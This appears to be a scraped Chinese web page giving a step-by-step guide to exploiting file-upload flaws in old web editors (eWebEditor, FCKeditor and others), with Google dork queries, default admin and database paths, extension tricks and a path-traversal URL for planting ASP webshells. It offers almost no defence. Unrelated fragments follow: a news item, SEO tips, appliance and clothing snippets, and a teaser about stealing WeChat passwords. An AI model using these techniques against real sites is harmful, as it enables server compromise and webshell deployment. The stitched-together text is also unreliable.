site:editor inurl:asp?id inurl:ewebeditornet 好比常见的编辑器破绽有: ewebeditor ewebeditornet fckeditor editor southidceditor SouthidcEditor bigcneditor 一:ewebeditor为例 1:默认下载下来的后台: http://www.test.com/ewebeditor/admin_login.asp 后台若是能进入: 可点击样式治理: standard 拷贝一份(直接修改改不了) 在拷贝的一份里加入图片类型( asa aaspsp ) 然后点预览 在编辑器里点设计 然后直接上传asa大马. 上传后 在代码里可以看到马的位置! (原理:由于在iis里 网站的属性里 应用程序设置一项 asa扩展名照样用asp.dll来剖析的,asp也是 另有 cer cdx ) 在cer cdx asa的被删掉 那么马儿就找不到 映射不过去. 可以在拷贝事后的样式 图片类型里加入 aaspsp 然后在上传 直接就可以上传asp文件 2:下载默认数据库 www.test.com/ewebeditor/db/ewebeditor.mdb 然后剖析数据库 webeditor_system(1) 就可以看到用户名和密码 若是破解不出来 可以在webeditor_style(14 样式内外 主要看允许上传文件的扩展名(s-fileext s_ingeext) 看到一个小黑客曾经搞过 多了asa aaspsp 可以用他来行使!(后台找不到的情况下也可以用此方式) 可以组织语句: 好比 ID=46 s-name =standard1 组织 代码: ewebeditor.asp?id=contentamp;style=standard ID和和样式名改事后 ewebeditor.asp?id=46amp;style=standard1 然后就是进入编辑器 上传asa 或者asp的 获得webshell 二:ewebeditornet 破绽行使 默认上传地址: www.test.com/ewebeditornet/upload.aspx 可以直接上传一个cer的木马 在无法上传的情况下 可以地址栏组织以下代码: javascript:lbtnUpload.click(); 然后查看源代码: 找到uploadsave 找到地址 默认传到uploadfile这个文件夹里 (破绽修补: 可以在iss里直接把upload文件夹的执行权限选择无. ) 三:fckeditor 破绽行使 http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUploadamp;Type=Imageamp;CurrentFolder=/ 就把文件名字段改成NEWfile 选择文件名可界说 上传事后在/userfiles/image/找文件 四:southidceditor http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb http://www.xhkjit.com/admin/southidceditor/popup.asp http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp 五:bigcneditor 这个页不多说了 原理都差不多! 提防方式很简单就不多讲了, FCKeditor上传破绽, http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=allamp;Connector=connectors/asp/connector.asp 打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是: http://www.xxx.com/UserFiles/all/1.asa "Type=all" 这个变量是自己界说的,在这里创建了all这个目录,而且新的目录没有上传文件花样的限制. 好比输入: http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyeramp;Connector=connectors/asp/connector.asp 所传的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了 而 若是这样输入:http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser /default/browser.html?Type=../amp;Connector=connectors/asp/connector.asp 就可以传到网站的根目录下,网站支持什么剧本,传什么剧本的马就可以了. 所传的文件就到了网站根目录下了 http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html?forumID=46amp;threadID=amp;messageID=amp;ListType=FromForumamp;FromCurrentPage=1amp;time=
新华社华盛顿12月7日电(记者邓仙来 孙丁)美国当选总统拜登7日宣布新政府医疗卫生团队提名人选,其中现任加利福尼亚州总检察长哈维尔·贝塞拉被提名为卫生与公众服务部长。 拜登过渡团队当天还提名...
搜索引擎高效优化的六大技巧 搜索引擎优化技巧 SEO搜索引擎优化的点较多,所以我们不止要对网站进行优化,还要掌握更高效率的网站seo优化方法,向搜索引擎传递友好性。 在不同的阶段,优化方法产...
DiskGenius本软件出示了硬盘坏道检测作用及比较有限的坏道修复作用。要应用本作用,点一下“电脑硬盘 - 坏道检测与修复”菜单栏,程序流程弹出来以下提示框: 请最先挑选要查验的电脑硬...
对于选购大家电来说,牌子的选择非常重要,这影响产品的使用寿命。我们要从产品的品质、售后服务、产品的特点多方面来分析、对比,三星冰箱与海尔冰箱都是国内外非常有名的品牌,选择哪个更好呢,让小编带你去看看吧...
网络黑客教你3分钟盗微信(网络黑客窃取微信密码的方法) 追随微信的运用人群渐渐地的再加上,安全风险变成了大家关键规定放在首位充分考虑的,微信呈现遭窃的风险性就渐渐地的提升,而能遭窃走的根本所在你的微信...
什么样的牛仔裤叫好穿?我觉得要满足以下条件: ❤裆部够长,不会让下面难受,下蹲时候也很自如 ❤材质柔软,弹性适度,我喜欢含棉量高的,因为穿进去一下子就很温暖,很柔软,很亲肤,这 在冬天特别重要...